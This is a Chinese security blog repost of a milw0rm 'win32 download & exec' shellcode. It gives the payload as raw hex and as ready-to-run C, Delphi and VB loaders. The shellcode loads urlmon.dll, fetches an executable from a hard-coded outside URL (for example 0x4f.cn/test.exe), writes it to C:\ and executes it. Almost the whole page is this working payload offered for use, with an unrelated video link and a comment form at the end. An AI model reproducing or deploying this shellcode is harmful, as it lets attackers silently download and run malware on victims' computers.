win32 download & exec shellcode 203 bytes

  • A+
所属分类:lcx

milw0rm 上的 win32 download & exec shellcode:

EB548B753C8B74357803F5568B762003F533C94941AD33DB360FBE142838F27408C1CB0D03DA40EBEF3BDF75E75E8B5E2403DD668B0C4B8B5E1C03DD8B048B03C5C375726C6D6F6E2E646C6C00433A5C672E6578650033C064034030780C8B400C8B701CAD8B4008EB098B40348D407C8B403C95BF8E4E0EECE884FFFFFF83EC04832C243CFFD09550BF361A2F70E86FFFFFFF8B5424FC8D52BA33DB535352EB2453FFD05DBF98FE8A0EE853FFFFFF83EC04832C2462FFD0BF7ED8E273E840FFFFFF52FFD0E8D7FFFFFF687474703A2F2F7777772E786F78782E75732F646F776E6C6F61642F746573742E657865

VC+:
/*
    ______________________WIN_SHELLCODE__________________________
/ :: win32 download & exec shellcode                              ::
:: by Darkeagle of Unl0ck Research Team [http://exploiterz.org] ::
/ :: to avoid 0x00 use ^^xor^^ }:>                                ::
:: greets goes to: Sowhat, 0x557 guys, 55k7 guys, RST/GHC guys. ::
/ ::_____________________________cya______________________________::

*/

#include
#include

unsigned char sh4llcode[] =
"xEBx54x8Bx75x3Cx8Bx74x35x78x03xF5x56x8Bx76x20x03"
"xF5x33xC9x49x41xADx33xDBx36x0FxBEx14x28x38xF2x74"
"x08xC1xCBx0Dx03xDAx40xEBxEFx3BxDFx75xE7x5Ex8Bx5E"
"x24x03xDDx66x8Bx0Cx4Bx8Bx5Ex1Cx03xDDx8Bx04x8Bx03"
"xC5xC3x75x72x6Cx6Dx6Fx6Ex2Ex64x6Cx6Cx00x43x3Ax5C"
"x55x2ex65x78x65x00x33xC0x64x03x40x30x78x0Cx8Bx40"
"x0Cx8Bx70x1CxADx8Bx40x08xEBx09x8Bx40x34x8Dx40x7C"
"x8Bx40x3Cx95xBFx8Ex4Ex0ExECxE8x84xFFxFFxFFx83xEC"
"x04x83x2Cx24x3CxFFxD0x95x50xBFx36x1Ax2Fx70xE8x6F"
"xFFxFFxFFx8Bx54x24xFCx8Dx52xBAx33xDBx53x53x52xEB"
"x24x53xFFxD0x5DxBFx98xFEx8Ax0ExE8x53xFFxFFxFFx83"
"xECx04x83x2Cx24x62xFFxD0xBFx7ExD8xE2x73xE8x40xFF"
"xFFxFFx52xFFxD0xE8xD7xFFxFFxFF"
"http://h0nest.org/1.exe";

int main()
{

 void (*c0de)();
 printf("Win32 "download & exec shellcode"n");
 *(int*)&c0de = sh4llcode;
 c0de();
}

// milw0rm.com [2005-12-23]

DELPHI:

program download;

const

ShellCode:Array [0..229] of Byte =
(
$EB, $54, $8B, $75, $3C, $8B, $74, $35, $78, $03,
$F5, $56, $8B, $76, $20, $03, $F5, $33, $C9, $49,
$41, $AD, $33, $DB, $36, $0F, $BE, $14, $28, $38,
$F2, $74, $08, $C1, $CB, $0D, $03, $DA, $40, $EB,
$EF, $3B, $DF, $75, $E7, $5E, $8B, $5E, $24, $03,
$DD, $66, $8B, $0C, $4B, $8B, $5E, $1C, $03, $DD,
$8B, $04, $8B, $03, $C5, $C3, $75, $72, $6C, $6D,
$6F, $6E, $2E, $64, $6C, $6C, $00, $43, $3A, $5C,
$55, $2E, $65, $78, $65, $00, $33, $C0, $64, $03,
$40, $30, $78, $0C, $8B, $40, $0C, $8B, $70, $1C,
$AD, $8B, $40, $08, $EB, $09, $8B, $40, $34, $8D,
$40, $7C, $8B, $40, $3C, $95, $BF, $8E, $4E, $0E,
$EC, $E8, $84, $FF, $FF, $FF, $83, $EC, $04, $83,
$2C, $24, $3C, $FF, $D0, $95, $50, $BF, $36, $1A,
$2F, $70, $E8, $6F, $FF, $FF, $FF, $8B, $54, $24,
$FC, $8D, $52, $BA, $33, $DB, $53, $53, $52, $EB,
$24, $53, $FF, $D0, $5D, $BF, $98, $FE, $8A, $0E,
$E8, $53, $FF, $FF, $FF, $83, $EC, $04, $83, $2C,
$24, $62, $FF, $D0, $BF, $7E, $D8, $E2, $73, $E8,
$40, $FF, $FF, $FF, $52, $FF, $D0, $E8, $D7, $FF,
$FF, $FF, $68, $74, $74, $70, $3A, $2F, $2F, $77,
$77, $77, $2E, $30, $78, $34, $66, $2E, $63, $6E,
$2F, $74, $65, $73, $74, $2E, $65, $78, $65, $00
); //www.0x4f.cn/test.exe

var
ShellCodeProc: procedure;

begin
ShellCodeProc := @ShellCode;
ShellCodeProc();
end.

VB:

Attribute VB_Name = "Module1"
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Sub Main()
Dim ShellCode
Dim download() As Byte
ShellCode = Array(&HEB, &H54, &H8B, &H75, &H3C, &H8B, &H74, &H35, &H78, &H3, _
&HF5, &H56, &H8B, &H76, &H20, &H3, &HF5, &H33, &HC9, &H49, _
&H41, &HAD, &H33, &HDB, &H36, &HF, &HBE, &H14, &H28, &H38, _
&HF2, &H74, &H8, &HC1, &HCB, &HD, &H3, &HDA, &H40, &HEB, _
&HEF, &H3B, &HDF, &H75, &HE7, &H5E, &H8B, &H5E, &H24, &H3, _
&HDD, &H66, &H8B, &HC, &H4B, &H8B, &H5E, &H1C, &H3, &HDD, _
&H8B, &H4, &H8B, &H3, &HC5, &HC3, &H75, &H72, &H6C, &H6D, _
&H6F, &H6E, &H2E, &H64, &H6C, &H6C, &H0, &H43, &H3A, &H5C, _
&H55, &H2E, &H65, &H78, &H65, &H0, &H33, &HC0, &H64, &H3, _
&H40, &H30, &H78, &HC, &H8B, &H40, &HC, &H8B, &H70, &H1C, _
&HAD, &H8B, &H40, &H8, &HEB, &H9, &H8B, &H40, &H34, &H8D, _
&H40, &H7C, &H8B, &H40, &H3C, &H95, &HBF, &H8E, &H4E, &HE, _
&HEC, &HE8, &H84, &HFF, &HFF, &HFF, &H83, &HEC, &H4, &H83, _
&H2C, &H24, &H3C, &HFF, &HD0, &H95, &H50, &HBF, &H36, &H1A, _
&H2F, &H70, &HE8, &H6F, &HFF, &HFF, &HFF, &H8B, &H54, &H24, _
&HFC, &H8D, &H52, &HBA, &H33, &HDB, &H53, &H53, &H52, &HEB, _
&H24, &H53, &HFF, &HD0, &H5D, &HBF, &H98, &HFE, &H8A, &HE, _
&HE8, &H53, &HFF, &HFF, &HFF, &H83, &HEC, &H4, &H83, &H2C, _
&H24, &H62, &HFF, &HD0, &HBF, &H7E, &HD8, &HE2, &H73, &HE8, _
&H40, &HFF, &HFF, &HFF, &H52, &HFF, &HD0, &HE8, &HD7, &HFF, _
&HFF, &HFF, &H68, &H74, &H74, &H70, &H3A, &H2F, &H2F, &H77, _
&H77, &H77, &H2E, &H30, &H78, &H34, &H66, &H2E, &H63, &H6E, _
&H2F, &H74, &H65, &H73, &H74, &H2E, &H65, &H78, &H65, &H0)

ReDim download(UBound(ShellCode))

For i = 0 To UBound(ShellCode)
     download(i) = ShellCode(i)
Next

CallWindowProc VarPtr(download(0)), ByVal 0&, ByVal 0&, ByVal 0&, ByVal 0&

End Sub

文章来源于lcx.cc:win32 download & exec shellcode 203 bytes

相关推荐: 【视频】萌猫萌狗抢薯片 - 注意狗狗动作

萌猫萌狗抢薯片,注意狗狗动作。这狗的眼神好复杂,这猫是狮子座的吧……文章来源于lcx.cc:【视频】萌猫萌狗抢薯片 - 注意狗狗动作相关推荐: Abs取、返回指定数字绝对值函数功能详解Abs 取、返回指定数字绝对值函数功能详解 功能描述:     返回数字的绝…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: